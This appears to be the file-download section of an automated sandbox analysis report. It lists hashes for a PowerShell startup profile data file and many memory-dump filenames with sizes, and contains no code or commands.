C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
8a4d446073d7f280356e94dddaa2d676

SHA1
d28f14b0bf7815145c936814a35ae9b4db95cc48

SHA256
12aae089d35df025df221af946d02d3766cb1c1932a5de1c18ff67d3baf3e949

SHA512
5e4269498889d79b0182b9ce5f894683c59b16a6c3a28aebbf9b250eb0947f383e21dbabe5fe1489a579a4b4820ecbd1456a1fc659e4e4e636f6b2e525caf84d

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
8a4d446073d7f280356e94dddaa2d676

SHA1
d28f14b0bf7815145c936814a35ae9b4db95cc48

SHA256
12aae089d35df025df221af946d02d3766cb1c1932a5de1c18ff67d3baf3e949

SHA512
5e4269498889d79b0182b9ce5f894683c59b16a6c3a28aebbf9b250eb0947f383e21dbabe5fe1489a579a4b4820ecbd1456a1fc659e4e4e636f6b2e525caf84d

Download Submit
memory/500-311-0x0000000000000000-mapping.dmp

Download
memory/732-249-0x0000000000000000-mapping.dmp

Download
memory/1128-334-0x00000207301C3000-0x00000207301C5000-memory.dmp

Filesize
8KB

Download
memory/1128-333-0x00000207301C0000-0x00000207301C2000-memory.dmp

Filesize
8KB

Download
memory/1240-196-0x00000286EE700000-0x00000286EE702000-memory.dmp

Filesize
8KB

Download
memory/1240-200-0x00000286EE703000-0x00000286EE705000-memory.dmp

Filesize
8KB

Download
memory/1240-187-0x0000000000000000-mapping.dmp

Download
memory/1240-252-0x00000286EE708000-0x00000286EE709000-memory.dmp

Filesize
4KB

Download
memory/1240-223-0x00000286EE706000-0x00000286EE708000-memory.dmp

Filesize
8KB

Download
memory/1252-302-0x0000000000000000-mapping.dmp

Download
memory/1428-247-0x0000029860EF6000-0x0000029860EF8000-memory.dmp

Filesize
8KB

Download
memory/1428-209-0x0000029860EF0000-0x0000029860EF2000-memory.dmp

Filesize
8KB

Download
memory/1428-199-0x0000000000000000-mapping.dmp

Download
memory/1428-268-0x0000029860EF8000-0x0000029860EF9000-memory.dmp

Filesize
4KB

Download
memory/1428-211-0x0000029860EF3000-0x0000029860EF5000-memory.dmp

Filesize
8KB

Download
memory/1444-301-0x0000000000000000-mapping.dmp

Download
memory/1472-307-0x0000000000000000-mapping.dmp

Download
memory/1764-219-0x00000157D2783000-0x00000157D2785000-memory.dmp

Filesize
8KB

Download
memory/1764-208-0x0000000000000000-mapping.dmp

Download
memory/1764-241-0x00000157D2786000-0x00000157D2788000-memory.dmp

Filesize
8KB

Download
memory/1764-218-0x00000157D2780000-0x00000157D2782000-memory.dmp

Filesize
8KB

Download
memory/1764-267-0x00000157D2788000-0x00000157D2789000-memory.dmp

Filesize
4KB

Download
memory/1820-303-0x0000000000000000-mapping.dmp

Download
memory/2008-246-0x0000000000000000-mapping.dmp

Download
memory/2088-298-0x0000000000000000-mapping.dmp

Download
memory/2188-259-0x0000000000000000-mapping.dmp

Download
memory/2196-258-0x0000000000000000-mapping.dmp

Download
memory/2248-272-0x0000000000000000-mapping.dmp

Download
memory/2248-118-0x0000000000000000-mapping.dmp

Download
memory/2248-186-0x000001C53B046000-0x000001C53B048000-memory.dmp

Filesize
8KB

Download
memory/2248-135-0x000001C53B043000-0x000001C53B045000-memory.dmp

Filesize
8KB

Download
memory/2248-134-0x000001C53B040000-0x000001C53B042000-memory.dmp

Filesize
8KB

Download
memory/2288-300-0x0000000000000000-mapping.dmp

Download
memory/2476-231-0x000001ED2D4E6000-0x000001ED2D4E8000-memory.dmp

Filesize
8KB

Download
memory/2476-192-0x0000000000000000-mapping.dmp

Download
memory/2476-207-0x000001ED2D4E0000-0x000001ED2D4E2000-memory.dmp

Filesize
8KB

Download
memory/2476-262-0x000001ED2D4E8000-0x000001ED2D4E9000-memory.dmp

Filesize
4KB

Download
memory/2476-212-0x000001ED2D4E3000-0x000001ED2D4E5000-memory.dmp

Filesize
8KB

Download
memory/2528-201-0x00000220FC8C0000-0x00000220FC8C2000-memory.dmp

Filesize
8KB

Download
memory/2528-230-0x00000220FC8C6000-0x00000220FC8C8000-memory.dmp

Filesize
8KB

Download
memory/2528-206-0x00000220FC8C3000-0x00000220FC8C5000-memory.dmp

Filesize
8KB

Download
memory/2528-190-0x0000000000000000-mapping.dmp

Download
memory/2528-261-0x00000220FC8C8000-0x00000220FC8C9000-memory.dmp

Filesize
4KB

Download
memory/3004-266-0x0000000000000000-mapping.dmp

Download
memory/3212-309-0x0000000000000000-mapping.dmp

Download
memory/3432-238-0x0000000000000000-mapping.dmp

Download
memory/3468-198-0x00000289B2B33000-0x00000289B2B35000-memory.dmp

Filesize
8KB

Download
memory/3468-197-0x00000289B2B30000-0x00000289B2B32000-memory.dmp

Filesize
8KB

Download
memory/3468-234-0x00000289B2B36000-0x00000289B2B38000-memory.dmp

Filesize
8KB

Download
memory/3468-193-0x0000000000000000-mapping.dmp

Download
memory/3468-264-0x00000289B2B38000-0x00000289B2B39000-memory.dmp

Filesize
4KB

Download
memory/3508-203-0x000002BF56033000-0x000002BF56035000-memory.dmp

Filesize
8KB

Download
memory/3508-263-0x000002BF56038000-0x000002BF56039000-memory.dmp

Filesize
4KB

Download
memory/3508-242-0x000002BF56036000-0x000002BF56038000-memory.dmp

Filesize
8KB

Download
memory/3508-202-0x000002BF56030000-0x000002BF56032000-memory.dmp

Filesize
8KB

Download
memory/3508-194-0x0000000000000000-mapping.dmp

Download
memory/3540-295-0x0000000000000000-mapping.dmp

Download
memory/3632-299-0x0000000000000000-mapping.dmp

Download
memory/3876-296-0x0000000000000000-mapping.dmp

Download
memory/3876-191-0x0000000000000000-mapping.dmp

Download
memory/3876-260-0x000001A3EDA58000-0x000001A3EDA59000-memory.dmp

Filesize
4KB

Download
memory/3876-204-0x000001A3EDA50000-0x000001A3EDA52000-memory.dmp

Filesize
8KB

Download
memory/3876-205-0x000001A3EDA53000-0x000001A3EDA55000-memory.dmp

Filesize
8KB

Download
memory/3876-229-0x000001A3EDA56000-0x000001A3EDA58000-memory.dmp

Filesize
8KB

Download
memory/3896-116-0x000000001B380000-0x000000001B382000-memory.dmp

Filesize
8KB

Download
memory/3896-114-0x0000000000690000-0x0000000000691000-memory.dmp

Filesize
4KB

Download
memory/3956-306-0x0000000000000000-mapping.dmp

Download
memory/3964-185-0x0000028BFE866000-0x0000028BFE868000-memory.dmp

Filesize
8KB

Download
memory/3964-133-0x0000028BFE9F0000-0x0000028BFE9F1000-memory.dmp

Filesize
4KB

Download
memory/3964-131-0x0000028BFE860000-0x0000028BFE862000-memory.dmp

Filesize
8KB

Download
memory/3964-117-0x0000000000000000-mapping.dmp

Download
memory/3964-127-0x0000028BFE7D0000-0x0000028BFE7D1000-memory.dmp

Filesize
4KB

Download
memory/3964-195-0x0000028BFE868000-0x0000028BFE869000-memory.dmp

Filesize
4KB

Download
memory/3964-132-0x0000028BFE863000-0x0000028BFE865000-memory.dmp

Filesize
8KB

Download
memory/4108-235-0x0000000000000000-mapping.dmp

Download
memory/4132-257-0x0000000000000000-mapping.dmp

Download
memory/4132-245-0x0000000000000000-mapping.dmp

Download
memory/4196-269-0x000001D872D78000-0x000001D872D79000-memory.dmp

Filesize
4KB

Download
memory/4196-221-0x000001D872D73000-0x000001D872D75000-memory.dmp

Filesize
8KB

Download
memory/4196-251-0x000001D872D76000-0x000001D872D78000-memory.dmp

Filesize
8KB

Download
memory/4196-213-0x0000000000000000-mapping.dmp

Download
memory/4196-220-0x000001D872D70000-0x000001D872D72000-memory.dmp

Filesize
8KB

Download
memory/4208-297-0x0000000000000000-mapping.dmp

Download
memory/4244-308-0x0000000000000000-mapping.dmp

Download
memory/4280-225-0x00000218D5070000-0x00000218D5072000-memory.dmp

Filesize
8KB

Download
memory/4280-253-0x00000218D5076000-0x00000218D5078000-memory.dmp

Filesize
8KB

Download
memory/4280-286-0x00000218D5078000-0x00000218D5079000-memory.dmp

Filesize
4KB

Download
memory/4280-214-0x0000000000000000-mapping.dmp

Download
memory/4280-226-0x00000218D5073000-0x00000218D5075000-memory.dmp

Filesize
8KB

Download
memory/4332-239-0x0000000000000000-mapping.dmp

Download
memory/4372-227-0x000002400F300000-0x000002400F302000-memory.dmp

Filesize
8KB

Download
memory/4372-215-0x0000000000000000-mapping.dmp

Download
memory/4372-254-0x000002400F306000-0x000002400F308000-memory.dmp

Filesize
8KB

Download
memory/4372-283-0x000002400F308000-0x000002400F309000-memory.dmp

Filesize
4KB

Download
memory/4372-228-0x000002400F303000-0x000002400F305000-memory.dmp

Filesize
8KB

Download
memory/4404-240-0x0000000000000000-mapping.dmp

Download
memory/4480-248-0x0000000000000000-mapping.dmp

Download
memory/4484-280-0x0000000000000000-mapping.dmp

Download
memory/4488-224-0x00000177BF2F3000-0x00000177BF2F5000-memory.dmp

Filesize
8KB

Download
memory/4488-222-0x00000177BF2F0000-0x00000177BF2F2000-memory.dmp

Filesize
8KB

Download
memory/4488-255-0x00000177BF2F6000-0x00000177BF2F8000-memory.dmp

Filesize
8KB

Download
memory/4488-285-0x00000177BF2F8000-0x00000177BF2F9000-memory.dmp

Filesize
4KB

Download
memory/4488-216-0x0000000000000000-mapping.dmp

Download
memory/4500-289-0x0000000000000000-mapping.dmp

Download
memory/4544-217-0x0000000000000000-mapping.dmp

Download
memory/4548-294-0x0000000000000000-mapping.dmp

Download
memory/4568-336-0x000002D27E620000-0x000002D27E622000-memory.dmp

Filesize
8KB

Download
memory/4568-335-0x000002D27E623000-0x000002D27E625000-memory.dmp

Filesize
8KB

Download
memory/4608-236-0x0000000000000000-mapping.dmp

Download
memory/4652-288-0x0000000000000000-mapping.dmp

Download
memory/4660-271-0x0000000000000000-mapping.dmp

Download
memory/4692-243-0x0000000000000000-mapping.dmp

Download
memory/4696-237-0x0000000000000000-mapping.dmp

Download
memory/4752-265-0x0000000000000000-mapping.dmp

Download
memory/4764-304-0x0000000000000000-mapping.dmp

Download
memory/4768-313-0x000002657A010000-0x000002657A012000-memory.dmp

Filesize
8KB

Download
memory/4768-315-0x000002657A016000-0x000002657A018000-memory.dmp

Filesize
8KB

Download
memory/4768-314-0x000002657A013000-0x000002657A015000-memory.dmp

Filesize
8KB

Download
memory/4772-291-0x0000000000000000-mapping.dmp

Download
memory/4864-276-0x0000000000000000-mapping.dmp

Download
memory/4908-281-0x0000000000000000-mapping.dmp

Download
memory/4916-275-0x0000000000000000-mapping.dmp

Download
memory/4932-250-0x0000000000000000-mapping.dmp

Download
memory/4988-332-0x000000001BBD0000-0x000000001BBD2000-memory.dmp

Filesize
8KB

Download
memory/4988-256-0x0000000000000000-mapping.dmp

Download
memory/4992-232-0x0000000000000000-mapping.dmp

Download
memory/5000-310-0x0000000000000000-mapping.dmp

Download
memory/5056-305-0x0000000000000000-mapping.dmp

Download
memory/5064-233-0x0000000000000000-mapping.dmp

Download
memory/5100-244-0x0000000000000000-mapping.dmp

Download
memory/5100-292-0x0000000000000000-mapping.dmp

Download